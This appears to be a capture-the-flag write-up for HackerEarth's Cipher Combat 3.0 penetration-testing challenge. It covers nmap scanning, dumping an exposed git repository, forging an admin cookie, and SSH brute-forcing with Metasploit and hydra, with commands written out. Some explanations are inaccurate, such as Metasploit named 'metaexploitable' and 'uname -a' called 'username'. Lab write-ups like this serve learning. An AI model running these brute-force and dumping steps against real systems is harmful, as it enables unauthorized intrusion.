HackerEarth’s Cipher Combat 3.0 -VAPT

This WriteUp is Solely Based on use of Kali Linux And its Tools.

nmap is the tool used to get information about the IP you want to enumerate. You can use it in any configuration but this configuration is best suited as it uses SYNACK method and hence it is a perfect combination .

Changes you can try → change T3 to T1,T2,T4 →Depending on speed

  • A → Enable OS detection, version detection, script scanning, and traceroute
  • -p- → for all ports

You can see nmap has found a github repository for us . Isn’t it just like a jackpot. This task is involves checking the repo out and getting info if you can

This task was pretty cool ! Just use of a SINGLE tool → https://github.com/internetwache/GitTools

You can Read the documentation and use it.

Step 1 : Using Dumper to dump all the files from repository

Step 2: Using Extractor to Take those file to a folder and analyze

Result from Dumper
Result from Extractor

Use the Command tree to out directory in this manner

cat [name shown above]/index.php

this will print the content of index.php file on terminal. Now you have to carefully see the php code and find the passcode.

Result → I found that saving the passcode in md5 format to cookie of WebBrowser will do work of us.

Using javascript code → document.cookie = “key=value”

And hence Admin access was granted on given link

For this i have activated the shell. and giving various commands showed the used and various files inside the system.

This Was really fun as the link provided wasn’t actually a website but a system itself. With New IP Address

Initial Procedure was Same as Running nmap and Finding the details.

Observation → Finding No Open port but → ssh can be seen in result

This task involves use of metaexploitable as tool . You can also try → Hydra is a brute-force SSH tool.

Procedure →

For Deep Understanding You can check → MetaExploitable

Open terminal (MetaExploitable)

msfconsole                                // start msf
use auxiliary/scanner/ssh/ssh_login // ssh_login
set RHOSTS [IP_of_target] // remote --> ip
set USERPASS_FILE /usr/share/metasploit framework/data/wordlists/root_userpass.txt //setting the userpass
set VERBOSE false // no extra
run // run the host
stop_on_success // as name suggests

Hydra

hydra -f -L /root/username -P /root/wordlist.txt ssh://[IP_Address]-f —> stop as soon as the couple login/password is found successfully;
-L/-P —> path to the users/passwords dictionary;
ssh://IP address —> service and victim IP address indication.

DAMN ! You have just Brute Forced on client.

We Have A Shell Now → →

sessions -i 1   // start the session 
id // id
uname -a // username
exit // exit the shell

Thanks For Reading !!

Plz UPVOTE ! 🙇‍♂️

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store